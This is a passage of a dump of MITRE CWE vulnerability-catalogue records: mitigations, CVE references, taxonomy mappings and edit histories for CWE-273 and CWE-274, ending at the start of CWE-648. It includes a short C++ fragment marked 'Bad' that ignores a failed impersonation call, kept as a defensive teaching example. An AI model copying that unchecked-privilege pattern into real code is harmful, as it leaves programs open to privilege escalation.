"Note": "If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator.",
"Scope": [
"Access Control",
"Non-Repudiation"
]
}
] |
[
{
"Description": "\n\nCompartmentalize the system to have \"safe\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.\n\n\nEnsure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-46",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
},
{
"Description": "Check the results of all functions that return a value and verify that the value is expected.",
"Effectiveness": "High",
"EffectivenessNotes": "Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment.",
"MitigationID": "MIT-53",
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "In Windows, make sure that the process token has the SeImpersonatePrivilege(Microsoft Server 2003). Code that relies on impersonation for security must ensure that the impersonation succeeded, i.e., that a proper privilege demotion happened.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2006-4447",
"Reference": "CVE-2006-4447"
},
{
"Description": "Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2006-2916",
"Reference": "CVE-2006-2916"
}
] |
[
"System Process"
] |
[
{
"EntryID": null,
"EntryName": "Failure to check whether privileges were dropped successfully",
"MappingFit": null,
"TaxonomyName": "CLASP"
},
{
"EntryID": "POS37-C",
"EntryName": "Ensure that privilege relinquishment is successful",
"MappingFit": "Exact",
"TaxonomyName": "CERT C Secure Coding"
},
{
"EntryID": "SFP4",
"EntryName": "Unchecked Status Condition",
"MappingFit": null,
"TaxonomyName": "Software Fault Patterns"
}
] | null |
[
{
"Authors": [
"Secure Software, Inc."
],
"Edition": null,
"ExternalReferenceID": "REF-18",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2005",
"Publisher": null,
"Section": null,
"Title": "The CLASP Application Security Process",
"URL": "https://cwe.mitre.org/documents/sources/TheCLASPApplicationSecurityProcess.pdf",
"URLDate": "2024-11-17"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "CLASP",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-11-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name, Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Background_Details, Other_Notes, Potential_Mitigations",
"ModificationDate": "2014-06-23",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships, Time_of_Introduction",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-03-10",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Failure to Check Whether Privileges Were Dropped Successfully",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-05-27",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Check for Successfully Dropped Privileges",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "754",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "271",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
},
{
"CweID": "252",
"Nature": "PeerOf",
"Ordinal": null,
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This code attempts to take on the privileges of a user before creating a file, thus avoiding performing the action with unnecessarily high privileges:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tbool DoSecureStuff(HANDLE hPipe) {\n\t\tbool fDataWritten = false;\n\t\tImpersonateNamedPipeClient(hPipe);\n\t\tHANDLE hFile = CreateFile(...);\n\t\t/../\n\t\tRevertToSelf()\n\t\t/../\n\t}\n```",
"IntroText": null,
"Language": "C++",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The call to ImpersonateNamedPipeClient may fail, but the return value is not checked. If the call fails, the code may execute with higher privileges than intended. In this case, an attacker could exploit this behavior to write a file to a location that the attacker does not have access to.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null |
Medium
|
[
"In Windows based environments that have access control, impersonation is used so that access checks can be performed on a client identity by a server with higher privileges. By impersonating the client, the server is restricted to client-level security -- although in different threads it may have much higher privileges."
] | 2
|
[
[
"703",
"754",
"273"
],
[
"284",
"269",
"271",
"273"
]
] |
[] |
274
|
Improper Handling of Insufficient Privileges
|
Base
|
Simple
|
Draft
|
The product does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Other",
"Alter Execution Logic"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Other"
]
}
] | null |
[
{
"Description": "System limits are not properly enforced after privileges are dropped.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1564",
"Reference": "CVE-2001-1564"
},
{
"Description": "Firewall crashes when it can't read a critical memory block that was protected by a malicious process.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-3286",
"Reference": "CVE-2005-3286"
},
{
"Description": "Does not give admin sufficient privileges to overcome otherwise legitimate user actions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1641",
"Reference": "CVE-2005-1641"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Insufficient privileges",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] | null | null |
[
{
"Note": "CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future.",
"Type": "Maintenance"
},
{
"Note": "Overlaps dropped privileges, insufficient permissions.",
"Type": "Relationship"
},
{
"Note": "This has a layering relationship with Unchecked Error Condition and Unchecked Return Value.",
"Type": "Theoretical"
},
{
"Note": "Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the product makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource).",
"Type": "Theoretical"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes, Theoretical_Notes",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationship_Notes, Theoretical_Notes",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships, Theoretical_Notes",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Insufficient Privileges",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-05-27",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Failure to Handle Insufficient Privileges",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Discouraged
|
This CWE entry could be deprecated in a future version of CWE.
|
See maintenance notes.
|
[
"Potential Deprecation",
"CWE Overlap"
] | null |
[
{
"CweID": "755",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "269",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
},
{
"CweID": "271",
"Nature": "PeerOf",
"Ordinal": null,
"ViewID": "1000"
},
{
"CweID": "280",
"Nature": "CanAlsoBe",
"Ordinal": null,
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] | null | null | null | null | null | 2
|
[
[
"703",
"755",
"274"
],
[
"284",
"269",
"274"
]
] |
[] |
648
|
Incorrect Use of Privileged APIs
|
Base
|
Simple
|
Incomplete
|
